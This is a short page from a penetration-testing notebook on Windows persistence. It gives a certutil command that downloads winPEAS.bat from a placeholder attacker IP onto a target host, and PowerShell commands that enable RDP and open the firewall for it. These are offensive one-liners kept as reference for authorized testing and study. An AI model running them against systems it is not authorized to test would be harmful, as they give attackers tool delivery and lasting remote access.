TurboWindX
  • Welcome
  • Hacking Methodologies
    • Known Tools & Technologies
    • Kill Chain
    • Phyisical and hardware
      • Full Screen Escape
  • Checklist - WebApps
  • Checklist - Windows
  • External Recon
    • Ports & services scanning
    • Web Recon
      • CMS
        • Wordpress
      • Path traversal & LFI/RFI
      • XSS - Cross site scripting
      • XML External Entity - XXE
  • Internal Recon
    • Active Directory
  • Post Exploitation
    • Container/Sandbox Breakout
    • Privilege Escalation
      • Hashing & Cracking
    • Persistence
      • Windows
    • Data Exfiltration
      • Steganography
      • Pivot & Tunneling
  • Shells
  • Protocols
    • FTP
    • SSH
    • DNS
    • IPP
  • Binary Exploitation
    • Linux - Simple reverse & crack
  • Memory Analysis
  • Forensics
  • Android & iOS
  • Database Injection & Exploitation
  • DDoS
  • Kubernetes & Docker
  • Phish
Powered by GitBook
On this page
  • CertUtil download file
  • Enable RDP

Was this helpful?

  1. Post Exploitation
  2. Persistence

Windows

CertUtil download file

certutil.exe -urlcache -split -f "http://<attacker-ip>:8081/winPEAS.bat" winpeas.bat

Enable RDP

Leverage powershell to enable rdp. Remember that by default, only one account can be logged.

#enable RDP
powershell Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

#allow rdp through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
PreviousPersistenceNextData Exfiltration

Last updated 3 years ago

Was this helpful?